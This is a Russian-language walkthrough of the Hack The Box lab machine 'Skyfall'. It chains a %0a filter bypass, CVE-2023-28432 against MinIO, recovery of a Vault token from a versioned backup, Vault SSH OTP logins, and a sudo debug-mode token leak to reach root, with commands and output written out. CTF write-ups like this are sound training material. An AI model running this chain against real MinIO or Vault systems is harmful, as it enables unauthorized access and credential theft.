Видео-версия
Все новые прохождения появляются сначала на канале t.me/kiberdruzhinnik. Подпишись, чтобы не пропускать новые!
Смотри на t.me/kiberdruzhinnik/161.
Обзор сервисов
Конечно же просканируем порты.
$ rustscan --ulimit=5000 --range=1-65535 -a 10.10.11.254 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.254:22
Open 10.10.11.254:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.10.11.254
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-04 18:55 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:55
Completed NSE at 18:55, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:55
Completed NSE at 18:55, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:55
Completed NSE at 18:55, 0.00s elapsed
Initiating Ping Scan at 18:55
Scanning 10.10.11.254 [2 ports]
Completed Ping Scan at 18:55, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:55
Completed Parallel DNS resolution of 1 host. at 18:55, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:55
Scanning 10.10.11.254 [2 ports]
Discovered open port 22/tcp on 10.10.11.254
Discovered open port 80/tcp on 10.10.11.254
Completed Connect Scan at 18:55, 0.05s elapsed (2 total ports)
Initiating Service scan at 18:55
Scanning 2 services on 10.10.11.254
Completed Service scan at 18:56, 6.12s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.254.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 1.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.22s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.00s elapsed
Nmap scan report for 10.10.11.254
Host is up, received syn-ack (0.056s latency).
Scanned at 2024-02-04 18:55:56 EST for 8s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCVqvI8vGs8EIUAAUiRze8kfKmYh9ETTUei3zRd1wWWLRBjSm+soBLfclIUP69cNtQOa961nyt2/BOwuR35cLR4=
| 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINk0VgEkDNZoIJwcG5LEVZDZkEeSRHLBmAOtd/pduzRW
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
Веб
Посмотрим, что имеется на веб-сервере.
В коде страницы найдем адрес demo.skyfall.htb.
Сразу же перейдем на него и залогинимся как guest:guest.
Видим панель управления сервисом, бэкенд написан на Flask.
Жмем MinIO Metrics:
Получаем 403:
Пробуем обойти фильтр с помощью символа %0a: http://demo.skyfall.htb/metrics%0a
Отсюда находим адрес кластера MinIO: http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster
Воспользуемся CVE-2023-28432.
Скачаем и установим клиент minio: https://min.io/docs/minio/linux/reference/minio-mc.html
$ curl https://dl.min.io/client/mc/release/linux-amd64/mc \
--create-dirs \
-o $HOME/minio-binaries/mc
$ chmod +x $HOME/minio-binaries/mc
$ export PATH=$PATH:$HOME/minio-binaries/
$ mc alias set myminio http://prd23-s3-backend.skyfall.htb ACCESS_KEY SECRET_KEY
$ mc admin info myminio
● minio-node1:9000
Uptime: 8 hours
Version: 2023-03-13T19:46:17Z
Network: 2/2 OK
Drives: 2/2 OK
Pool: 1
● minio-node2:9000
Uptime: 8 hours
Version: 2023-03-13T19:46:17Z
Network: 2/2 OK
Drives: 2/2 OK
Pool: 1
Pools:
1st, Erasure sets: 1, Drives per erasure set: 4
1.6 MiB Used, 8 Buckets, 11 Objects, 4 Versions
4 drives online, 0 drives offline
Выведем список всех файлов с их версиями и скачаем файл бэкапа:
$ mc ls --recursive --versions myminio
[2023-11-07 23:59:15 EST] 0B askyy/
[2023-11-08 00:35:28 EST] 48KiB STANDARD bba1fcc2-331d-41d4-845b-0887152f19ec v1 PUT askyy/Welcome.pdf
[2023-11-09 16:37:25 EST] 2.5KiB STANDARD 25835695-5e73-4c13-82f7-30fd2da2cf61 v3 PUT askyy/home_backup.tar.gz
[2023-11-09 16:37:09 EST] 2.6KiB STANDARD 2b75346d-2a47-4203-ab09-3c9f878466b8 v2 PUT askyy/home_backup.tar.gz
[2023-11-09 16:36:30 EST] 1.2MiB STANDARD 3c498578-8dfe-43b7-b679-32a3fe42018f v1 PUT askyy/home_backup.tar.gz
[2023-11-07 23:58:56 EST] 0B btanner/
[2023-11-08 00:35:36 EST] 48KiB STANDARD null v1 PUT btanner/Welcome.pdf
[2023-11-07 23:58:33 EST] 0B emoneypenny/
[2023-11-08 00:35:56 EST] 48KiB STANDARD null v1 PUT emoneypenny/Welcome.pdf
[2023-11-07 23:58:22 EST] 0B gmallory/
[2023-11-08 00:36:02 EST] 48KiB STANDARD null v1 PUT gmallory/Welcome.pdf
[2023-11-07 19:08:01 EST] 0B guest/
[2023-11-07 19:08:05 EST] 48KiB STANDARD null v1 PUT guest/Welcome.pdf
[2024-02-04 11:16:25 EST] 4.8KiB STANDARD null v1 PUT guest/ph1
[2024-02-04 11:26:33 EST] 3.4KiB STANDARD null v1 PUT guest/shell.php
[2023-11-07 23:59:05 EST] 0B jbond/
[2023-11-08 00:35:45 EST] 48KiB STANDARD null v1 PUT jbond/Welcome.pdf
[2023-11-07 23:58:10 EST] 0B omansfield/
[2023-11-08 00:36:09 EST] 48KiB STANDARD null v1 PUT omansfield/Welcome.pdf
[2023-11-07 23:58:45 EST] 0B rsilva/
[2023-11-08 00:35:51 EST] 48KiB STANDARD null v1 PUT rsilva/Welcome.pdf
$ mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz ./home_backup.tar.gz
$ tar -xzvf home_backup.tar.gz
$ cat .bashrc
Файл .bashrc содержит адрес и токен для Vault:
Подключимся к Vault, посмотрим на SSH-роли и выпишем себе OTP токен для SSH:
$ wget https://releases.hashicorp.com/vault/1.15.5/vault_1.15.5_linux_amd64.zip
$ unzip vault_1.15.5_linux_amd64.zip
$ export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
$ ./vault login
TOKEN
$ ./vault token capabilities ssh/roles
list
$ ./vault list ssh/roles
Keys
----
admin_otp_key_role
dev_otp_key_role
otp_key_role
$ ./vault ssh -role dev_otp_key_role -mode OTP -strict-host-key-checking=no [email protected]
Вместо пароля используем OTP, который показан выше.
Флаг пользователя
Повышение привилегий
Можем использовать /root/vault/vault-unseal -c /etc/vault-unseal.yaml как привилегированный пользователь:
askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User askyy may run the following commands on skyfall:
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
Включим режим отладки, который сольет мастер-токен:
$ rm -rf debug.log
$ touch debug.log
$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
$ cat debug.log
2024/02/04 18:50:28 Initializing logger...
2024/02/04 18:50:28 Reading: /etc/vault-unseal.yaml
2024/02/04 18:50:28 Security Risk!
2024/02/04 18:50:28 Master token found in config: TOKEN
2024/02/04 18:50:28 Found Vault node: http://prd23-vault-internal.skyfall.htb
2024/02/04 18:50:28 Check interval: 5s
2024/02/04 18:50:28 Max checks: 5
2024/02/04 18:50:28 Establishing connection to Vault...
2024/02/04 18:50:28 Successfully connected to Vault: http://prd23-vault-internal.skyfall.htb
2024/02/04 18:50:28 Checking seal status
2024/02/04 18:50:28 Vault sealed: false
Аналогичным образом подключимся как root:
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
./vault login
TOKEN
./vault ssh -role admin_otp_key_role -mode OTP -strict-host-key-checking=no [email protected]
Как и ранее, вводим OTP код.
Флаг суперпользователя
